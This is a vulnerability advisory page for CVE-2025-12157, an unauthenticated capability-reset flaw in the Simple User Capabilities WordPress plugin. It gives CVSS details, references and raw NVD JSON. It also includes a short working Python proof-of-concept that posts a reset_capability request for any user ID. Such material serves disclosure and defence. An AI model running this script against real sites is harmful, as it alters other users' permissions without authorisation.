CVE-2025-12157

Description

The Simple User Capabilities plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'wp_ajax_nopriv_reset_capability' AJAX endpoint in all versions up to, and including, 1.0. This makes it possible for unauthenticated attackers to reset any user's capabilities.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Simple User Capabilities插件 <= 1.0 (所有版本)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2025-12157 PoC
# Simple User Capabilities Plugin < 1.0 - Unauthenticated Capability Reset

target_url = sys.argv[1] if len(sys.argv) > 1 else 'http://target-wordpress-site.com'
target_user_id = sys.argv[2] if len(sys.argv) > 2 else '1'

# AJAX endpoint URL
ajax_url = f"{target_url}/wp-admin/admin-ajax.php"

# Payload for reset_capability action
data = {
    'action': 'reset_capability',
    'user_id': target_user_id
}

print(f"[*] Sending request to {ajax_url}")
print(f"[*] Targeting user ID: {target_user_id}")

try:
    response = requests.post(ajax_url, data=data, timeout=10)
    
    if response.status_code == 200:
        print(f"[+] Request sent successfully")
        print(f"[*] Response status: {response.status_code}")
        print(f"[*] Response content: {response.text[:500]}")
    else:
        print(f"[!] Request failed with status: {response.status_code}")
except requests.exceptions.RequestException as e:
    print(f"[!] Error: {e}")

# Note: This PoC demonstrates the vulnerability exists
# Successful exploitation requires the target to have the vulnerable plugin installed

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-12157
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-12157
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-12157/
[4] VulDB https://vuldb.com/cve/CVE-2025-12157
[5] https://plugins.svn.wordpress.org/simple-user-capabilities/tags/1.0/user_access.php
[6] https://wordpress.org/plugins/simple-user-capabilities/
[7] https://www.wordfence.com/threat-intel/vulnerabilities/id/3a1d0432-aff0-477e-aa6e-4de3e4d789cb?source=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-12157", "sourceIdentifier": "[email protected]", "published": "2025-11-04T05:16:09.357", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Simple User Capabilities plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'wp_ajax_nopriv_reset_capability' AJAX endpoint in all versions up to, and including, 1.0. This makes it possible for unauthenticated attackers to reset any user's capabilities."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.svn.wordpress.org/simple-user-capabilities/tags/1.0/user_access.php", "source": "[email protected]"}, {"url": "https://wordpress.org/plugins/simple-user-capabilities/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/3a1d0432-aff0-477e-aa6e-4de3e4d789cb?source=cve", "source": "[email protected]"}]}}